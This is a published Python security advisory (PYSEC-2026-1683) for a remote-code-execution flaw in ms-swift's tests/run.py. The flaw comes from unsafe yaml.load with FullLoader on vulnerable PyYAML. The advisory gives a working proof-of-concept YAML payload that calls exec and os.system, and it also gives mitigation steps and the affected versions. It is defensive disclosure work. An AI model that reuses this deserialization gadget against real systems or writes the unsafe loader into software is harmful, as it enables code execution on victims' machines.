PYSEC-2026-1683

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/ms-swift/PYSEC-2026-1683.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1683
Aliases
Published
2026-07-07T16:02:59.265625Z
Modified
2026-07-07T17:47:17.742699310Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
  • 2.3 (Low) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N CVSS Calculator
Summary
MS SWIFT Remote Code Execution via unsafe PyYAML deserialization
Details

Description

A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.

If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.

Affected Repository

  • Project: modelscope/ms-swift
  • Affect versions: latest
  • File: tests/run.py
  • GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Dependency: PyYAML <= 5.3.1

Vulnerable Code

if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Proof of Concept (PoC)

Step 1: Create malicious YAML file (exploit.yaml)

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

This results in execution of os.system, proving code execution.

Mitigation

  • Replace yaml.load() with yaml.safe_load()
  • Upgrade PyYAML to version 5.4 or later

Example Fix:

# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)

Author

References

Affected packages

PyPI / ms-swift

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
3.6.3

Affected versions

1.*
1.0.0
1.1.0
1.2.0
1.2.1
1.3.0
1.4.0
1.5.0
1.5.1
1.5.2
1.5.3
1.5.4
1.6.0
1.6.1
1.6.2
1.6.3
1.7.0
1.7.1
1.7.2
1.7.3
2.*
2.0.0
2.0.1
2.0.2
2.0.3
2.0.3.post1
2.0.4
2.0.5
2.0.5.post1
2.1.0
2.1.1
2.1.1.post1
2.1.1.post2
2.2.0
2.2.1
2.2.2
2.2.3
2.2.4
2.2.5
2.3.0
2.3.0.post1
2.3.1
2.3.2
2.3.2.post1
2.4.0
2.4.0.post1
2.4.1
2.4.2
2.4.2.post1
2.4.2.post2
2.5.0.post1
2.5.1
2.5.1.post1
2.5.2
2.5.2.post1
2.6.0
2.6.0.post1
2.6.0.post2
2.6.1
3.*
3.0.0
3.0.1
3.0.1.post1
3.0.2
3.0.2.post1
3.0.3
3.1.0
3.1.1
3.1.1.post1
3.2.0
3.2.0.post2
3.2.1
3.2.2
3.3.0
3.3.0.post1
3.3.1
3.4.0
3.4.1
3.4.1.post1
3.5.0
3.5.1
3.5.2
3.5.3
3.6.0
3.6.1
3.6.2
3.6.3

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/ms-swift/PYSEC-2026-1683.yaml"